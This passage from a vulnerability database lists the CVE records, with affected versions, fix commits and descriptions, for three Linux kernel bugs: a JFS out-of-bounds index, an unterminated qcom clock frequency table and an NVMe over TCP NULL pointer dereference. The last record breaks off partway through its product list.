R10: 00005555559a72c0 R11: 0000000000000246 R12: 00000000f8008000
R13: 0000000000000000 R14: 00083878000000f8 R15: 0000000000000000
</TASK>
The issue is caused when the value of fsi becomes less than -1.
The check to break the loop when fsi value becomes -1 is present
but syzbot was able to produce value less than -1 which cause the error.
This patch simply add the change for the values less than 0.
The patch is tested via syzbot.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52603",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-26T20:37:06.643976Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-26T20:37:16.164Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.262Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e30b52a2ea3d1e0aaee68096957cf90a2f4ec5af"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fd3486a893778770557649fe28afa5e463d4ed07"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7aa33854477d9c346f5560a1a1fcb3fe7783e2a8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e4ce01c25ccbea02a09a5291c21749b1fc358e39"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e4cbc857d75d4e22a1f75446e7480b1f305d8d60"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/edff092a59260bf0b0a2eba219cb3da6372c2f9f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6e2902ecc77e9760a9fc447f56d598383e2372d2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/27e56f59bab5ddafbcfe69ad7a4a6ea1279c1b16"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/jfs/jfs_dtree.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e30b52a2ea3d1e0aaee68096957cf90a2f4ec5af",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "fd3486a893778770557649fe28afa5e463d4ed07",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7aa33854477d9c346f5560a1a1fcb3fe7783e2a8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e4ce01c25ccbea02a09a5291c21749b1fc358e39",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e4cbc857d75d4e22a1f75446e7480b1f305d8d60",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "edff092a59260bf0b0a2eba219cb3da6372c2f9f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6e2902ecc77e9760a9fc447f56d598383e2372d2",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "27e56f59bab5ddafbcfe69ad7a4a6ea1279c1b16",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/jfs/jfs_dtree.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.77",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nUBSAN: array-index-out-of-bounds in dtSplitRoot\n\nSyzkaller reported the following issue:\n\noop0: detected capacity change from 0 to 32768\n\nUBSAN: array-index-out-of-bounds in fs/jfs/jfs_dtree.c:1971:9\nindex -2 is out of range for type \u0027struct dtslot [128]\u0027\nCPU: 0 PID: 3613 Comm: syz-executor270 Not tainted 6.0.0-syzkaller-09423-g493ffd6605b2 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 09/22/2022\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x1b1/0x28e lib/dump_stack.c:106\n ubsan_epilogue lib/ubsan.c:151 [inline]\n __ubsan_handle_out_of_bounds+0xdb/0x130 lib/ubsan.c:283\n dtSplitRoot+0x8d8/0x1900 fs/jfs/jfs_dtree.c:1971\n dtSplitUp fs/jfs/jfs_dtree.c:985 [inline]\n dtInsert+0x1189/0x6b80 fs/jfs/jfs_dtree.c:863\n jfs_mkdir+0x757/0xb00 fs/jfs/namei.c:270\n vfs_mkdir+0x3b3/0x590 fs/namei.c:4013\n do_mkdirat+0x279/0x550 fs/namei.c:4038\n __do_sys_mkdirat fs/namei.c:4053 [inline]\n __se_sys_mkdirat fs/namei.c:4051 [inline]\n __x64_sys_mkdirat+0x85/0x90 fs/namei.c:4051\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\nRIP: 0033:0x7fcdc0113fd9\nCode: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 c7 c1 c0 ff ff ff f7 d8 64 89 01 48\nRSP: 002b:00007ffeb8bc67d8 EFLAGS: 00000246 ORIG_RAX: 0000000000000102\nRAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fcdc0113fd9\nRDX: 0000000000000000 RSI: 0000000020000340 RDI: 0000000000000003\nRBP: 00007fcdc00d37a0 R08: 0000000000000000 R09: 00007fcdc00d37a0\nR10: 00005555559a72c0 R11: 0000000000000246 R12: 00000000f8008000\nR13: 0000000000000000 R14: 00083878000000f8 R15: 0000000000000000\n \u003c/TASK\u003e\n\nThe issue is caused when the value of fsi becomes less than -1.\nThe check to break the loop when fsi value becomes -1 is present\nbut syzbot was able to produce value less than -1 which cause the error.\nThis patch simply add the change for the values less than 0.\n\nThe patch is tested via syzbot."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:39:42.168Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e30b52a2ea3d1e0aaee68096957cf90a2f4ec5af"
},
{
"url": "https://git.kernel.org/stable/c/fd3486a893778770557649fe28afa5e463d4ed07"
},
{
"url": "https://git.kernel.org/stable/c/7aa33854477d9c346f5560a1a1fcb3fe7783e2a8"
},
{
"url": "https://git.kernel.org/stable/c/e4ce01c25ccbea02a09a5291c21749b1fc358e39"
},
{
"url": "https://git.kernel.org/stable/c/e4cbc857d75d4e22a1f75446e7480b1f305d8d60"
},
{
"url": "https://git.kernel.org/stable/c/edff092a59260bf0b0a2eba219cb3da6372c2f9f"
},
{
"url": "https://git.kernel.org/stable/c/6e2902ecc77e9760a9fc447f56d598383e2372d2"
},
{
"url": "https://git.kernel.org/stable/c/27e56f59bab5ddafbcfe69ad7a4a6ea1279c1b16"
}
],
"title": "UBSAN: array-index-out-of-bounds in dtSplitRoot",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52603",
"datePublished": "2024-03-06T06:45:29.731Z",
"dateReserved": "2024-03-02T21:55:42.573Z",
"dateUpdated": "2025-05-04T07:39:42.168Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26966 (GCVE-0-2024-26966)
Vulnerability from cvelistv5
Published
2024-05-01 05:19
Modified
2025-05-04 09:01
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
clk: qcom: mmcc-apq8084: fix terminating of frequency table arrays
The frequency table arrays are supposed to be terminated with an
empty element. Add such entry to the end of the arrays where it
is missing in order to avoid possible out-of-bound access when
the table is traversed by functions like qcom_find_freq() or
qcom_find_freq_floor().
Only compile tested.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 2b46cd23a5a2cf0b8d3583338b63409f5e78e7cd Version: 2b46cd23a5a2cf0b8d3583338b63409f5e78e7cd Version: 2b46cd23a5a2cf0b8d3583338b63409f5e78e7cd Version: 2b46cd23a5a2cf0b8d3583338b63409f5e78e7cd Version: 2b46cd23a5a2cf0b8d3583338b63409f5e78e7cd Version: 2b46cd23a5a2cf0b8d3583338b63409f5e78e7cd Version: 2b46cd23a5a2cf0b8d3583338b63409f5e78e7cd Version: 2b46cd23a5a2cf0b8d3583338b63409f5e78e7cd Version: 2b46cd23a5a2cf0b8d3583338b63409f5e78e7cd |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.707Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5533686e99b04994d7c4877dc0e4282adc9444a2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b2dfb216f32627c2f6a8041f2d9d56d102ab87c0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a09aecb6cb482de88301c43bf00a6c8726c4d34f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3aedcf3755c74dafc187eb76acb04e3e6348b1a9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/185de0b7cdeaad8b89ebd4c8a258ff2f21adba99"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9b4c4546dd61950e80ffdca1bf6925f42b665b03"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7e5432401536117c316d7f3b21d46b64c1514f38"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5638330150db2cc30b53eed04e481062faa3ece8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a903cfd38d8dee7e754fb89fd1bebed99e28003d"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26966",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:45:23.145806Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:47.058Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/clk/qcom/mmcc-apq8084.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5533686e99b04994d7c4877dc0e4282adc9444a2",
"status": "affected",
"version": "2b46cd23a5a2cf0b8d3583338b63409f5e78e7cd",
"versionType": "git"
},
{
"lessThan": "b2dfb216f32627c2f6a8041f2d9d56d102ab87c0",
"status": "affected",
"version": "2b46cd23a5a2cf0b8d3583338b63409f5e78e7cd",
"versionType": "git"
},
{
"lessThan": "a09aecb6cb482de88301c43bf00a6c8726c4d34f",
"status": "affected",
"version": "2b46cd23a5a2cf0b8d3583338b63409f5e78e7cd",
"versionType": "git"
},
{
"lessThan": "3aedcf3755c74dafc187eb76acb04e3e6348b1a9",
"status": "affected",
"version": "2b46cd23a5a2cf0b8d3583338b63409f5e78e7cd",
"versionType": "git"
},
{
"lessThan": "185de0b7cdeaad8b89ebd4c8a258ff2f21adba99",
"status": "affected",
"version": "2b46cd23a5a2cf0b8d3583338b63409f5e78e7cd",
"versionType": "git"
},
{
"lessThan": "9b4c4546dd61950e80ffdca1bf6925f42b665b03",
"status": "affected",
"version": "2b46cd23a5a2cf0b8d3583338b63409f5e78e7cd",
"versionType": "git"
},
{
"lessThan": "7e5432401536117c316d7f3b21d46b64c1514f38",
"status": "affected",
"version": "2b46cd23a5a2cf0b8d3583338b63409f5e78e7cd",
"versionType": "git"
},
{
"lessThan": "5638330150db2cc30b53eed04e481062faa3ece8",
"status": "affected",
"version": "2b46cd23a5a2cf0b8d3583338b63409f5e78e7cd",
"versionType": "git"
},
{
"lessThan": "a903cfd38d8dee7e754fb89fd1bebed99e28003d",
"status": "affected",
"version": "2b46cd23a5a2cf0b8d3583338b63409f5e78e7cd",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/clk/qcom/mmcc-apq8084.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.17"
},
{
"lessThan": "3.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: qcom: mmcc-apq8084: fix terminating of frequency table arrays\n\nThe frequency table arrays are supposed to be terminated with an\nempty element. Add such entry to the end of the arrays where it\nis missing in order to avoid possible out-of-bound access when\nthe table is traversed by functions like qcom_find_freq() or\nqcom_find_freq_floor().\n\nOnly compile tested."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:01:00.828Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/5533686e99b04994d7c4877dc0e4282adc9444a2"
},
{
"url": "https://git.kernel.org/stable/c/b2dfb216f32627c2f6a8041f2d9d56d102ab87c0"
},
{
"url": "https://git.kernel.org/stable/c/a09aecb6cb482de88301c43bf00a6c8726c4d34f"
},
{
"url": "https://git.kernel.org/stable/c/3aedcf3755c74dafc187eb76acb04e3e6348b1a9"
},
{
"url": "https://git.kernel.org/stable/c/185de0b7cdeaad8b89ebd4c8a258ff2f21adba99"
},
{
"url": "https://git.kernel.org/stable/c/9b4c4546dd61950e80ffdca1bf6925f42b665b03"
},
{
"url": "https://git.kernel.org/stable/c/7e5432401536117c316d7f3b21d46b64c1514f38"
},
{
"url": "https://git.kernel.org/stable/c/5638330150db2cc30b53eed04e481062faa3ece8"
},
{
"url": "https://git.kernel.org/stable/c/a903cfd38d8dee7e754fb89fd1bebed99e28003d"
}
],
"title": "clk: qcom: mmcc-apq8084: fix terminating of frequency table arrays",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26966",
"datePublished": "2024-05-01T05:19:36.656Z",
"dateReserved": "2024-02-19T14:20:24.201Z",
"dateUpdated": "2025-05-04T09:01:00.828Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-6356 (GCVE-0-2023-6356)
Vulnerability from cvelistv5
Published
2024-02-07 21:04
Modified
2025-11-06 21:45
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-476 - NULL Pointer Dereference
Summary
A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver and causing kernel panic and a denial of service.
References
| URL | Tags | |||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Red Hat | Red Hat Enterprise Linux 8 |
Unaffected: 0:4.18.0-513.18.1.rt7.320.el8_9 < * cpe:/a:redhat:enterprise_linux:8::realtime cpe:/a:redhat:enterprise_linux:8::nfv |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-6356",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-02T13:53:04.324723Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:17:04.696Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T18:21:56.394Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "RHSA-2024:0723",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0723"
},
{
"name": "RHSA-2024:0724",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0724"
},
{
"name": "RHSA-2024:0725",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0725"
},
{
"name": "RHSA-2024:0881",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0881"
},
{
"name": "RHSA-2024:0897",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0897"
},
{
"name": "RHSA-2024:1248",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1248"
},
{
"name": "RHSA-2024:2094",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2094"
},
{
"name": "RHSA-2024:3810",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3810"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-6356"
},
{
"name": "RHBZ#2254054",
"tags": [
"issue-tracking",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254054"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20240415-0002/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFYW6R64GPLUOXSQBJI3JBUX3HGLAYPP/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::realtime",
"cpe:/a:redhat:enterprise_linux:8::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-513.18.1.rt7.320.el8_9",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::crb",
"cpe:/o:redhat:enterprise_linux:8::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-513.18.1.el8_9",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:8.6::crb",
"cpe:/o:redhat:rhev_hypervisor:4.4::el8",
"cpe:/o:redhat:rhel_eus:8.6::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.6 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-372.91.1.el8_6",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:8.8::crb",
"cpe:/o:redhat:rhel_eus:8.8::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.8 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-477.58.1.el8_8",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::appstream",
"cpe:/o:redhat:enterprise_linux:9::baseos",
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/a:redhat:enterprise_linux:9::nfv",
"cpe:/a:redhat:enterprise_linux:9::realtime"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-362.24.1.el9_3",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::appstream",
